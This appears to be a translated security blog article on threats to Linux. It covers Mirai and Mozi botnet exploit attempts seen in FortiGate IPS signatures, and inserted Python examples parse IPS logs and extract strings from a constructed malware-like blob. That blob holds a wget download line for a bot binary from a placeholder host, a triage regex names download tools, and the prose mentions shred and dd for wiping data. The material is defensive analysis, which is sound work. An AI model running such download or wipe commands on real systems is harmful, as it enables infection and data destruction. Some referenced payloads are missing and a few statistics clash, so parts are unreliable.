The Dark Side of Linux: Understanding Threats and Real Attack Attempts

The sky is blue, water is wet, and Linux is the most secure operating system. There's no arguing with that.

The system has many built-in mechanisms that contribute to its security; restricting access rights is one of them. In addition, Linux is guarded by a large and active user community that regularly tests the system for vulnerabilities and releases patches.

However, it is impossible to claim that the protection here works 100%. At the very least, no one is immune from problems with system updates and configuration errors.

In this article, which we prepared together with private detective Yuri Verbitsky, we will examine:

  • why, how and who attacks companies that use Linux,

  • how to track attempted attacks, looking at the technical details using the example of signatures triggered in an NGFW.

What is not in this article

We have deliberately left out topics related to attacks:

  • on Docker environments,

  • on the supply chain via PyPI and npm dependencies,

  • on applications and services that run on top of the Linux kernel.

First, the facts

Today, the Linux kernel is used on a huge number of platforms, including embedded and portable devices. There are hundreds of distributions tailored to any task and user skill level (by the way, if you are new to information security, we recommend staying as far away from the BlackArch distribution as possible).

So, the following are currently running on the Linux kernel:

  • two-thirds of the world's web servers. As reported by W3Techs (Web Technology Surveys), Linux as a platform is used by more than 40% of sites for which there is relevant data. If we take the top 1000, the figure is even higher – 47.4%,

  • space technology. In particular, 32 missions have been completed using Linux. The operating system is built into the Curiosity rover, and SpaceX uses Linux on Dragon and Falcon 9,

  • the Internet of Things, or more precisely, embedded and mobile devices (cameras, lighting, door locks, smart TVs, motion sensors, speakers, thermostats, etc.),

  • many popular switches, routers, firewalls,

  • solutions for virtualization and cloud computing. Almost all products are built on the Linux kernel, including VMware, Citrix, Docker,

  • supercomputers. An example is the supercomputer for the UK meteorological agency GAEA. It is also designed on the Linux base,

  • malware 🙂

Linux is highly granular, which means almost unlimited possibilities for customization, management and control. With Windows NT, by contrast, you can only monitor what Microsoft allows.

As you know, Microsoft is gradually tightening the screws in its relations with Russian companies. That is why many of its clients are now looking at other operating systems, and Linux is the first candidate.

And what is wrong?

Companies often believe in the super-security of GNU/Linux. Many do not think about the risks of working with the system at all, and even less about the measures that should minimize those risks.

For years, forensic experts have seen in practice how “childish” information security problems lead to the compromise of Linux infrastructure:

  • weak authentication passwords,

  • unpatched vulnerabilities (for example, administrators and developers set up a server and forget about it, because it has been working stably for years and the firmware seems not to require any special care),

  • configuration errors.

It turns out that Linux can be considered the most secure operating system, but only in theory. In practice, companies cannot relax.

Who and how attacks

Historical fact: the very first threat to the Linux kernel is considered to be the so-called “Morris worm”. Let us recall that this malware attacked the ARPANET network on November 2, 1988. The program used mechanisms for automatic distribution over the network and caused the first “denial of service” in history. Much water has flowed under the bridge since then, but the principles of that virus attack are still relevant today.

Now let's get back to the present. Attacks on Linux systems are becoming significantly more frequent. According to Kaspersky Lab, their number has increased by 126% in the last year alone.

The attacks are backed by malware of all kinds: from botnets and miners that infect absolutely everything that is accessible and unprotected on the Internet, to more sophisticated tools. The latter are used by highly qualified specialists who plan their actions more selectively and carefully. Attacks on Linux infrastructure with such malware usually lead to the complete destruction, encryption or theft of sensitive information. Cyber espionage is another motive for criminals.

At the same time, attackers often demonstrate sophisticated approaches to malware development. For example, HelloKitty ransomware targets both platforms (Windows and Linux). And recently, researchers discovered tools for encrypting ESXi type-1 hypervisors.

If the system is compromised, the attackers quickly achieve their goal. In particular, to destroy information on Linux it is enough to use the shred command, which overwrites data N times before deleting it. They say that even an experienced forensic expert will not be able to recover data deleted this way. Another option is the dd command with the if=/dev/{u}random argument.

What else can we say about attacks on Linux systems:

  • The interest of criminals in clouds is growing. An example is the cybercriminal group TeamTNT, which targets Linux-based cloud and container infrastructures. The attackers use advanced Trojans for remote access to the compromised environment; one such tool is CHAOS RAT,

  • malware development is harder than for Windows NT,

  • the set of attack tools is becoming more diverse, widespread and harder to detect. An example is fileless attacks using the Ezuri tool, which is written in Go (Golang),

  • DarkSide ransomware used the Salsa20 and RSA-1024 encryption algorithms in its attacks; they work equally well on both Windows and Linux.

Technical details

The most frequent and relevant motives for infecting Linux infrastructure remain:

  • building a botnet for subsequent rental for massive DDoS attacks, as well as using hacked routers and IoT devices as proxies to hide the attacking infrastructure in targeted attacks. This was heavily influenced by the public release of the Mirai source code in 2016, which anyone who wanted to could then use,

  • cryptocurrency mining. Such attacks are typically associated with Monero, partly because of the peculiarities of that cryptocurrency's blockchain architecture.

These are the cases that information security engineers encounter most often in practice. They are not hard to detect if the company has an NGFW with regularly updated intrusion detection signatures (IDS/IPS). And if an engineer takes the time to analyze the signatures, they can discover a lot of interesting and useful things.
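To show what this kind of signature analysis looks like in practice, here is an added example (our own illustration, not the article's or Fortinet's code): it parses FortiGate-style key=value IPS log records, counts hits per signature and flags sources that tried several different exploits in a row. The log lines are constructed; only the Multiple.CCTV.DVR.Vendors.Remote.Code.Execution signature name comes from this article, the other signature names, addresses and times are made up.

```python
import re
from collections import defaultdict

# Constructed sample records in FortiGate's key=value syslog format. The field
# names are FortiGate's; the addresses, times and all signature names except
# Multiple.CCTV.DVR.Vendors.Remote.Code.Execution (from the article) are made up.
SAMPLE_LOGS = """\
date=2024-03-01 time=10:02:11 type="utm" subtype="ips" eventtype="signature" severity="critical" srcip=203.0.113.10 dstip=192.0.2.5 action="dropped" attack="ThinkPHP.Example.Remote.Code.Execution"
date=2024-03-01 time=10:02:13 type="utm" subtype="ips" eventtype="signature" severity="critical" srcip=203.0.113.10 dstip=192.0.2.5 action="dropped" attack="DLink.DSL.Example.Remote.Code.Execution"
date=2024-03-01 time=10:02:15 type="utm" subtype="ips" eventtype="signature" severity="critical" srcip=203.0.113.10 dstip=192.0.2.5 action="dropped" attack="Multiple.CCTV.DVR.Vendors.Remote.Code.Execution"
date=2024-03-01 time=10:05:40 type="utm" subtype="ips" eventtype="signature" severity="high" srcip=198.51.100.7 dstip=192.0.2.5 action="dropped" attack="Multiple.CCTV.DVR.Vendors.Remote.Code.Execution"
date=2024-03-01 time=10:06:02 type="utm" subtype="webfilter" eventtype="urlfilter" severity="low" srcip=192.0.2.9 dstip=203.0.113.40 action="passthrough" url="http://example.invalid/"
"""

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse_line(line):
    """Turn one FortiGate record into a dict, stripping the quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def ips_events(log_text):
    """Keep only IPS signature hits; webfilter and other subtypes are ignored."""
    records = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [r for r in records
            if r.get("subtype") == "ips" and r.get("eventtype") == "signature"]

def summarize(log_text, scanner_threshold=3):
    """Return (hits per signature, sources that fired >= scanner_threshold
    distinct signatures). One host walking through unrelated RCE exploits
    within seconds is the usual footprint of a botnet spreader, not of a
    targeted attack."""
    per_signature = defaultdict(int)
    signatures_by_src = defaultdict(set)
    for ev in ips_events(log_text):
        per_signature[ev["attack"]] += 1
        signatures_by_src[ev["srcip"]].add(ev["attack"])
    scanners = sorted(src for src, sigs in signatures_by_src.items()
                      if len(sigs) >= scanner_threshold)
    return dict(per_signature), scanners

if __name__ == "__main__":
    counts, scanners = summarize(SAMPLE_LOGS)
    for sig, n in sorted(counts.items(), key=lambda kv: -kv[1]):
        print(f"{n:3d}  {sig}")
    print("sources trying multiple exploits:", scanners)
```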

Let's take a closer look at some of the signatures (the data was collected from one well-configured perimeter FortiGate).

Example 1. Signature for remote execution of arbitrary code in the free ThinkPHP framework on the Apache2 HTTP server:

This is actually an old vulnerability – it has been around for over five years. However, it is still widely exploited in the wild.

Thanks to the NGFW, we can see exactly how the exploit works and, most importantly in our case, the payload and how it is launched. An attempt is made to download an executable file. But it turns out that the sample cannot be obtained so easily: the server hosting the malicious code drops the connection. The reason is the wrong HTTP headers:

Example 1a. A similar infection attempt, but with a different payload:

We receive the data and submit it to VirusTotal, where we see a detection ratio of 38/62. At this point it immediately becomes clear: we are looking at another variant of the Mirai botnet.

Example 2. Signature of remote code execution in the firmware of D-Link DSL-2750B Small Office/Home Office (SOHO) devices.

The vulnerability dates back to 2020. The exploit is available in the well-known Metasploit framework. Whereas in the previous case there was an ELF executable, this time the analysis reveals a shell script with the .sh extension.

With a few simple manipulations we obtain the script itself and observe the following picture:

The script turns out to be a loader of malicious executable files for various microprocessor architectures.

To understand this, we used the strings tool. With its help, you can determine part of the functionality of almost any compiled malware. The tool extracts printable ASCII and Unicode strings from any file. This practice is widely used in forensic work and applies to Windows, Linux and Mac.
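As an added illustration of what strings actually does (our own example, not the tool's source or the article's sample), the following Python reimplements its core: it pulls runs of printable ASCII and little-endian UTF-16 characters out of a byte blob together with their offsets, then triages the lines an analyst would read first. The blob is constructed here to resemble a multi-architecture loader; it is not the UnHAnaAW.x86 sample, and the URL in it is a placeholder.

```python
import re

MIN_LEN = 4  # the same default minimum length the strings tool uses

# Constructed stand-in for a loader binary: an ELF-like header, binary noise,
# ASCII command lines, one UTF-16LE string and a compiler tag. This is not the
# UnHAnaAW.x86 sample from the article; the URL is a placeholder.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + bytes(range(0, 32))
    + b"/bin/busybox wget http://placeholder.invalid/bins/bot.mips\x00"
    + b"\x03\x9c\xff\xfe\x00\x00"
    + "/tmp/.x86 chmod 777".encode("utf-16-le") + b"\x00\x00"
    + b"\x80\x81\x82" + b"killall -9 telnetd\x00"
    + b"GCC: (GNU) 9.3.0\x00"
)

# What an analyst greps for first in strings output: URLs, temp paths and
# download/execute helpers. A triage heuristic, not a verdict.
TRIAGE_RE = re.compile(r"https?://|/tmp/|\b(?:wget|tftp|chmod|killall|busybox)\b")

def extract_strings(data, min_len=MIN_LEN):
    """Return (offset, encoding, text) for every run of at least min_len
    printable characters, in ASCII (like plain `strings -t d`) and in
    little-endian UTF-16 (like `strings -e l`), sorted by offset."""
    found = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)

def triage(found):
    """Keep only the extracted strings that match the TRIAGE_RE indicators."""
    return [s for s in found if TRIAGE_RE.search(s[2])]

if __name__ == "__main__":
    for offset, enc, text in triage(extract_strings(SAMPLE_BLOB)):
        print(f"{offset:6d} {enc:9s} {text}")
```

Note that the UTF-16 string is invisible to a plain ASCII pass, which is why forensic workflows run strings in both modes before concluding a sample "contains nothing".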

The x86 sample (UnHAnaAW.x86) contains a lot of information that might give a technical specialist some food for thought. In our opinion, here are the most interesting lines:

Juggling a couple of OSINT techniques, we found a GitHub repository with this malware. And not only this one. But let's not talk about that 🙂

Example 3. Signature Multiple.CCTV.DVR.Vendors.Remote.Code.Execution

Here we see the Mozi peer-to-peer botnet, which has been operating since at least 2019. The malware can exploit a 2016 vulnerability in video surveillance devices from numerous (!) vendors. It is important to emphasize that it can exploit this vulnerability, but is not limited to this equipment. The exploit code is freely available on popular resources such as Exploit-DB and Vulners.

An excerpt from the public exploit code that correlates perfectly with what we see in the signature body:

This is not the end yet

While we were analyzing the triggered signatures, the idea came up to deploy a honeypot. Recall that such solutions are used to make an attacker believe that he is interacting with a real system.

Which honeypot exactly was chosen, whether it was possible to lure the hackers and how it all ended, we will tell you next time. Follow the publications in our blog, or better yet, subscribe – it will be harder to miss a new article 😉
